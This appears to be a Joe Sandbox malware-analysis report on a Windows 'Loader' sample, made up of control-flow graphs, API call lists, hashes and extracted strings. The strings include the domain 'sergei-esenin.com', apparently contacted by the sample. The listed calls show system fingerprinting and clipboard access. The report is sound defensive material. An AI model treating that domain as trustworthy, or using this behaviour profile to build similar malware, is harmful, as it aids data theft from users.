                                                                                                                      control_flow_graph 92 4112a3-4112da call 43c610 95 4112e0-411305 92->95 95->95 96 411307-41136f 95->96 97 411370-4113a9 96->97 97->97 98 4113ab-4113bc 97->98 99 4113dd 98->99 100 4113be-4113c8 98->100 102 4113e0-4113e8 99->102 101 4113d0-4113d9 100->101 101->101 103 4113db 101->103 104 4113fb-411408 102->104 105 4113ea-4113eb 102->105 103->102 107 41142b-411433 104->107 108 41140a-411411 104->108 106 4113f0-4113f9 105->106 106->104 106->106 109 411435-411436 107->109 110 41144b-411585 107->110 111 411420-411429 108->111 112 411440-411449 109->112 113 411590-4115b6 110->113 111->107 111->111 112->110 112->112 113->113 114 4115b8-4115ef 113->114 115 4115f0-411658 114->115 115->115 116 41165a-411695 call 40ff00 115->116 119 4116c0-4116fc GetSystemDirectoryW 116->119 120 4116b0-4116bf CoUninitialize 116->120 121 411760-411766 call 403c00 116->121 122 411790 116->122 123 411743 116->123 124 411803 116->124 125 411792-4117bb call 404570 116->125 126 4117f4-4117fc call 43bbd0 116->126 127 411777-411785 call 40c720 116->127 128 411749-411752 call 403c00 116->128 129 41169c-4116a9 116->129 130 41176f 116->130 134 411703 119->134 135 4116fe-411701 119->135 121->130 146 4117c0-4117da 125->146 126->119 126->120 126->121 126->122 126->123 126->124 126->125 126->127 126->128 126->129 126->130 127->122 128->121 129->120 129->121 129->122 129->123 129->124 129->125 129->126 129->127 129->128 129->130 130->127 142 411704-41170c 134->142 135->134 135->142 144 411713 142->144 145 41170e-411711 142->145 147 411714-41172d call 40c710 call 43d3b0 call 440350 144->147 145->144 145->147 146->146 148 4117dc-4117ed call 4045f0 146->148 156 411732-41173c 147->156 148->124 148->126 156->120 156->121 156->122 156->123 156->124 156->125 156->126 156->127 156->128 156->130
                                                                                                                      APIs
                                                                                                                      • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004116C6
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.2304137041.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: DirectorySystem
                                                                                                                      • String ID: 12294815856B912D9A562334B477E717$sergei-esenin.com$z
                                                                                                                      • API String ID: 2188284642-1348092731
                                                                                                                      • Opcode ID: 92d048695fba465c126d9f9c742e20136716da17a6c2b0c8a8bb2ffbd6b60a50
                                                                                                                      • Instruction ID: 345b3c13d49c59ed0b7ac164e6a763aa61c9bb11201d1002ab0abdaf27a0931a
                                                                                                                      • Opcode Fuzzy Hash: 92d048695fba465c126d9f9c742e20136716da17a6c2b0c8a8bb2ffbd6b60a50
                                                                                                                      • Instruction Fuzzy Hash: 96C120B550D3C08BE3319F2498917EBBBE2EF96304F08496ED8D98B391D73948058B87

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 157 43ccc5-43ccdf 158 43cce0-43cd29 157->158 158->158 159 43cd2b-43cdae SysAllocString 158->159 160 43cdb0-43ce0e 159->160 160->160 161 43ce10-43ce31 SysAllocString 160->161 162 43ce35 161->162 162->162
                                                                                                                      APIs
                                                                                                                      • SysAllocString.OLEAUT32(?), ref: 0043CD30
                                                                                                                      • SysAllocString.OLEAUT32(F3BFF1A3), ref: 0043CE15
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.2304137041.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocString
                                                                                                                      • String ID: !$s%u'
                                                                                                                      • API String ID: 2525500382-439224852
                                                                                                                      • Opcode ID: 2be98a605ab4fa336a6b2c318d79c7287d5e615792c9c667367571fb568a7bc0
                                                                                                                      • Instruction ID: 37b18a3e4ebf56d3d23ab1ff9e7973853f3fda15609219be389b3e4743c51eac
                                                                                                                      • Opcode Fuzzy Hash: 2be98a605ab4fa336a6b2c318d79c7287d5e615792c9c667367571fb568a7bc0
                                                                                                                      • Instruction Fuzzy Hash: CE4104B66993418FE314CF66D8C425BBBE3ABC5304F19996CE0949B345CBB8C50B8B52

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 163 43c754-43c757 164 43c752 163->164 165 43c700-43c746 CoCreateInstance 163->165 166 43c6ca-43c6f6 CoCreateInstance 163->166 164->163 165->164 166->165
                                                                                                                      APIs
                                                                                                                      • CoCreateInstance.OLE32(00449CF0,00000000,00000001,00449CE0,00000000), ref: 0043C6F0
                                                                                                                      • CoCreateInstance.OLE32(00449CF0,00000000,00000001,00449CE0,00000000), ref: 0043C746
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.2304137041.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateInstance
                                                                                                                      • String ID: \
                                                                                                                      • API String ID: 542301482-2967466578
                                                                                                                      • Opcode ID: c5e4514dbbed5f853774e9bd6e6f5144ba8530d52371be91707f697448a59d9b
                                                                                                                      • Instruction ID: 831dfc0ff0a5989b13bcf6da42eb41807a4eea7ad8a9b6a3e013ccaa1ef03f5d
                                                                                                                      • Opcode Fuzzy Hash: c5e4514dbbed5f853774e9bd6e6f5144ba8530d52371be91707f697448a59d9b
                                                                                                                      • Instruction Fuzzy Hash: 59F0BDB4188300EFF320CF10C88AB5BBBE4BB85715F108419F699592D0CBB99458CF9A
                                                                                                                      APIs
                                                                                                                      • LdrInitializeThunk.NTDLL(004463BD,005C003F,00000006,?,?,00000018,?,?,?), ref: 004430BE
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.2304137041.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
                                                                                                                      • Instruction ID: fb6f357373f259be8b0e83fffc5d2a3912a28e0da7d2036ce94b71e982b3a7e9
                                                                                                                      • Opcode Fuzzy Hash: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
                                                                                                                      • Instruction Fuzzy Hash: 76E0FE75908316AB9A09CF45C14444EFBE5BFC4714F11CC8DA4D867210D3B0AD46DF82

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 69 43cb4d-43cb70 call 40c720 VariantClear 75 43cc27-43cc95 SysFreeString * 3 call 4457f0 GetVolumeInformationW 69->75 80 43cb80-43cb89 75->80 81 43cb90-43cb9c 75->81 82 43cba6-43cbca call 4352d0 75->82 83 43cca4-43ccb6 75->83 84 43cc9c-43cca3 75->84 80->81 80->82 81->82 85 43cba3 81->85 86 43cbf0-43cbfd 81->86 87 43cc04-43cc10 81->87 90 43cbd0-43cbd8 82->90 83->80 83->81 83->82 83->84 85->82 86->86 86->87 87->75 87->80 87->81 87->82 87->84 90->90 91 43cbda-43cbe4 90->91 91->86 91->87
                                                                                                                      APIs
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 0043CB56
                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 0043CC31
                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 0043CC37
                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 0043CC48
                                                                                                                      • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 0043CC8C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.2304137041.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FreeString$ClearInformationVariantVolume
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1909038640-0
                                                                                                                      • Opcode ID: 6e28de4ba5478020d8d62bc26180408a0e151cd4c9bce5f6e352a1b502264b13
                                                                                                                      • Instruction ID: 71f6587865aeb7983240f0c874f145aba01153f807fa23e12df9d9708cfabf33
                                                                                                                      • Opcode Fuzzy Hash: 6e28de4ba5478020d8d62bc26180408a0e151cd4c9bce5f6e352a1b502264b13
                                                                                                                      • Instruction Fuzzy Hash: 7A31CA3A608340DFD7149F20EC99B5EB3A6EB89316F18483CE505872A1EB75E414CB15

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 288 43c75e-43c798 289 43c7a0-43c7e7 288->289 289->289 290 43c7e9-43c80e SysAllocString 289->290 291 43c812-43c817 290->291
                                                                                                                      APIs
                                                                                                                      • SysAllocString.OLEAUT32(C30DC172), ref: 0043C7EE
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.2304137041.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocString
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2525500382-0
                                                                                                                      • Opcode ID: db18a2924d06b779c85f447bad0e32e0505d9cde8ebe1f2047603a1bc77517cd
                                                                                                                      • Instruction ID: 32f87fcb3125a501a8162f492a5ccfcff4981966fb883e090f713be905f41a06
                                                                                                                      • Opcode Fuzzy Hash: db18a2924d06b779c85f447bad0e32e0505d9cde8ebe1f2047603a1bc77517cd
                                                                                                                      • Instruction Fuzzy Hash: 02112C755883028FD314CF95C8C075ABBE1FBCA321F088A6CE4859B245D778D50ACFA1

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 292 440350-44035f 293 440366-440377 292->293 294 4403c0 292->294 295 4403d1-4403d5 292->295 296 4403c2-4403cb RtlFreeHeap 292->296 297 440380-4403a6 293->297 294->296 296->295 297->297 298 4403a8-4403b1 297->298 298->294
                                                                                                                      APIs
                                                                                                                      • RtlFreeHeap.NTDLL(?,00000000,?), ref: 004403CB
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.2304137041.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FreeHeap
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3298025750-0
                                                                                                                      • Opcode ID: 430a487729389f3d10e887d9154233dceb637cb42ec30677b57755ed99ff6f15
                                                                                                                      • Instruction ID: 4a203bc74b8270b695fc07406262592e49ddfe5960292de94af20fe31efdee2e
                                                                                                                      • Opcode Fuzzy Hash: 430a487729389f3d10e887d9154233dceb637cb42ec30677b57755ed99ff6f15
                                                                                                                      • Instruction Fuzzy Hash: 03F0F6342893408FD709DB24ECB1B2A7BA9DB9A305F54457CD0C147292C27A982ADB92

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 299 443250-443264 300 443270-4432a4 299->300 300->300 301 4432a6-4432ee GetForegroundWindow call 446050 300->301
                                                                                                                      APIs
                                                                                                                      • GetForegroundWindow.USER32 ref: 004432BD
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.2304137041.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ForegroundWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2020703349-0
                                                                                                                      • Opcode ID: b08362b67b80bfc51f9b0781085942b41de1b7f4ec4a0f44df321009077aec9b
                                                                                                                      • Instruction ID: 0a330300c86dc513bb90ae8d1cfff6d0cb8803b403817d65af22f579e6835f05
                                                                                                                      • Opcode Fuzzy Hash: b08362b67b80bfc51f9b0781085942b41de1b7f4ec4a0f44df321009077aec9b
                                                                                                                      • Instruction Fuzzy Hash: 98014936A042409BE719CF79D87567BB7D1AF15306B08846DD187C7392E738A609C709
                                                                                                                      APIs
                                                                                                                      • RtlAllocateHeap.NTDLL(?,00000000), ref: 0044033F
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.2304137041.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocateHeap
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1279760036-0
                                                                                                                      • Opcode ID: 2485c01211ce712cfbbd45a4efc2b111ae01a3d9bf3e5c06704cc5ec5e162443
                                                                                                                      • Instruction ID: 802ee138748a9c1de57adb9ff5e7dd8bb977f0f805929440982499d5bfcd79cd
                                                                                                                      • Opcode Fuzzy Hash: 2485c01211ce712cfbbd45a4efc2b111ae01a3d9bf3e5c06704cc5ec5e162443
                                                                                                                      • Instruction Fuzzy Hash: 99F0EC39380724CFCB168AA2F840555B721EBC663A71881FAD9315BAE2C2790817CB90
                                                                                                                      APIs
                                                                                                                      • GetForegroundWindow.USER32 ref: 004432BD
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.2304137041.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ForegroundWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2020703349-0
                                                                                                                      • Opcode ID: 8706f1abee52da8bff56e989da8888f74a9f68174d20dcfd9d535ed2545853d7
                                                                                                                      • Instruction ID: 730dbf267ab9c65472c63067bb6e41d1d4c7e74c9f538b4d6545cc4e430076e3
                                                                                                                      • Opcode Fuzzy Hash: 8706f1abee52da8bff56e989da8888f74a9f68174d20dcfd9d535ed2545853d7
                                                                                                                      • Instruction Fuzzy Hash: 3CE0867E5003009FC700DF54EC9146937A0E7073063050439E143D33A2D734A544CB1A
                                                                                                                      APIs
                                                                                                                      • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00411293
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.2304137041.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeSecurity
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 640775948-0
                                                                                                                      • Opcode ID: 4c2b1588ea85639d6cb6d05cbbdf0db7d68b21365f39083882640298d32fd0a2
                                                                                                                      • Instruction ID: 1bf7a1bd5185e41d29c4a2cbb7d1407be12a0acaffe88bf902526c463dcd8eef
                                                                                                                      • Opcode Fuzzy Hash: 4c2b1588ea85639d6cb6d05cbbdf0db7d68b21365f39083882640298d32fd0a2
                                                                                                                      • Instruction Fuzzy Hash: ACD092343D8300B6F2710B08BC17F043120A303F22F700320B3207C1E189E07110961E
                                                                                                                      APIs
                                                                                                                      • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0043C833
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.2304137041.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: BlanketProxy
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3890896728-0
                                                                                                                      • Opcode ID: ff6f4091f85bc74b46a1bdf2edf96c5b09c9cbc6c8c7167365f80d7df66e59cf
                                                                                                                      • Instruction ID: 654b4b1d450e911c26586d927dca2102275bdb567952844bef8e5804c0f87415
                                                                                                                      • Opcode Fuzzy Hash: ff6f4091f85bc74b46a1bdf2edf96c5b09c9cbc6c8c7167365f80d7df66e59cf
                                                                                                                      • Instruction Fuzzy Hash: BAD048383C4308BAF3324B14FC1BF083664B792F03F201420B781BC0E18AF1A2609A1E
                                                                                                                      APIs
                                                                                                                      • CoInitialize.OLE32(00000000), ref: 00411271
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.2304137041.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Initialize
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2538663250-0
                                                                                                                      • Opcode ID: 57e0faa4300627c3268436e8894b121cac013d14c93084444cf44528358cced8
                                                                                                                      • Instruction ID: 3969f46c452db3cda2ce3cdd2237f3c33a7c6bfde3ae9b63386c6deee56049b4
                                                                                                                      • Opcode Fuzzy Hash: 57e0faa4300627c3268436e8894b121cac013d14c93084444cf44528358cced8
                                                                                                                      • Instruction Fuzzy Hash: F9C08C30024208A7F220272DAC0BF43392CE303721F000330F9A0400D2AA106420C5BB
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.2304137041.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                                                                      • String ID: $$%$&$'$)$+$.$9
                                                                                                                      • API String ID: 2832541153-3297824023
                                                                                                                      • Opcode ID: 3ce986d396178c151528bd5f4b5afb913e096d77f4e20d0f1a1bcddece8bf8e8
                                                                                                                      • Instruction ID: d33222a2ca9ce09790efce9b4cbed54a8356bf1745a76b5c02e39eac2e3862f8
                                                                                                                      • Opcode Fuzzy Hash: 3ce986d396178c151528bd5f4b5afb913e096d77f4e20d0f1a1bcddece8bf8e8
                                                                                                                      • Instruction Fuzzy Hash: 6B41D0B150D3818EE324AF7C944832EBFE09B96314F099A6EE8C647382C67D8549D797
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.2304137041.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Uninitialize
                                                                                                                      • String ID: 4 E$4 E$8$:;:9$D'5%$H#Y!$M/_-$T]R#$o+X)$sergei-esenin.com
                                                                                                                      • API String ID: 3861434553-420977703
                                                                                                                      • Opcode ID: e0d83c3951a9deeca5a5b059ff3980b8643d139917b223a44aaaaabbf40ac77a
                                                                                                                      • Instruction ID: b550fdd234e3f7751dd64647aa8f612fe1cd7ee4e9b901a9b95261a5fc48f54b
                                                                                                                      • Opcode Fuzzy Hash: e0d83c3951a9deeca5a5b059ff3980b8643d139917b223a44aaaaabbf40ac77a
                                                                                                                      • Instruction Fuzzy Hash: 14E114715093818BE330CF2598517EFBBE1AF96304F08496ED4C99B292DB388549CB96
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.2304137041.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Q@g`$7#v
                                                                                                                      • API String ID: 0-593499481
                                                                                                                      • Opcode ID: a76b6db544b6370b7875e51f78da93b6d4cdad03fe21e88086ea2638993ebbcd
                                                                                                                      • Instruction ID: eae350f86fd92dff23fe4261f9e26cd0abfbdae7ba8eea48a10bab641a56ca95
                                                                                                                      • Opcode Fuzzy Hash: a76b6db544b6370b7875e51f78da93b6d4cdad03fe21e88086ea2638993ebbcd
                                                                                                                      • Instruction Fuzzy Hash: 8C51E1B4508344EFE3209F26E84971BBBE0FB85704F54096CF1849B2A2DB75C915CB9B
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.2304137041.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MetricsSystem
                                                                                                                      • String ID: &~C$'wC$*xC$J~C$m|C$xzC${C
                                                                                                                      • API String ID: 4116985748-588620804
                                                                                                                      • Opcode ID: 764eab8b42627bb81cdfd695d464b7b564659876efbf52c05c039a8eca4bf054
                                                                                                                      • Instruction ID: 66dada05c327a1c61d24dc321b899d0899824898c12b3fe3090271d05fad01cc
                                                                                                                      • Opcode Fuzzy Hash: 764eab8b42627bb81cdfd695d464b7b564659876efbf52c05c039a8eca4bf054
                                                                                                                      • Instruction Fuzzy Hash: 4FA14CB44093888AF771DF54D5897CBBBE0BB85348F20892ED5888B650C7F9548DCF9A
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.2304137041.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocString
                                                                                                                      • String ID: 0$0$b$c$y$}
                                                                                                                      • API String ID: 2525500382-2751227332
                                                                                                                      • Opcode ID: bb8b5806c04763b47c3ab5a792d058afedefd6bca67dd728f44cdc8407738252
                                                                                                                      • Instruction ID: 821cf9130e8cd5f6ebb1de99dcc4691c8eaef027f498815a5d700e8551cc5c2a
                                                                                                                      • Opcode Fuzzy Hash: bb8b5806c04763b47c3ab5a792d058afedefd6bca67dd728f44cdc8407738252
                                                                                                                      • Instruction Fuzzy Hash: DC81E16010CBC0CEE7168B3884983167ED15B6621CF2886DDD4AA4F3D3C3ABD55BC766
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.2304137041.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: [fbY$_nkQ$kkUp
                                                                                                                      • API String ID: 0-3145123041
                                                                                                                      • Opcode ID: 57f64d875186bd8352f334b1d93851cbe806884a8da132c403b6ed4246dd0043
                                                                                                                      • Instruction ID: af3b9e1362d38e8e29a38f19127dd51eee7be2d5c57223e9247a5dcb9c366cf1
                                                                                                                      • Opcode Fuzzy Hash: 57f64d875186bd8352f334b1d93851cbe806884a8da132c403b6ed4246dd0043
                                                                                                                      • Instruction Fuzzy Hash: EF712771504B418BE332CF25C881B63BBE2AF66311F188A2ED5EB4B792D739B405CB55
                                                                                                                      APIs
                                                                                                                      • SysAllocString.OLEAUT32(73A371AF), ref: 0043CEB0
                                                                                                                      • SysAllocString.OLEAUT32(F3BFF1A3), ref: 0043CF95
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.2304137041.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocString
                                                                                                                      • String ID: !$s%u'
                                                                                                                      • API String ID: 2525500382-439224852
                                                                                                                      • Opcode ID: 7aa0a3e6246a502dca2869c8a1477f858b5ec105c237375db835c5495004350d
                                                                                                                      • Instruction ID: 751ce87b811b7694680259d72d00ac5741bc3653d925cc6629c8f6403113edbc
                                                                                                                      • Opcode Fuzzy Hash: 7aa0a3e6246a502dca2869c8a1477f858b5ec105c237375db835c5495004350d
                                                                                                                      • Instruction Fuzzy Hash: 0841D0762993419BD308CFA6D8D025FBBE3ABC5304F199D2DE1949B345CBB8C50A8B52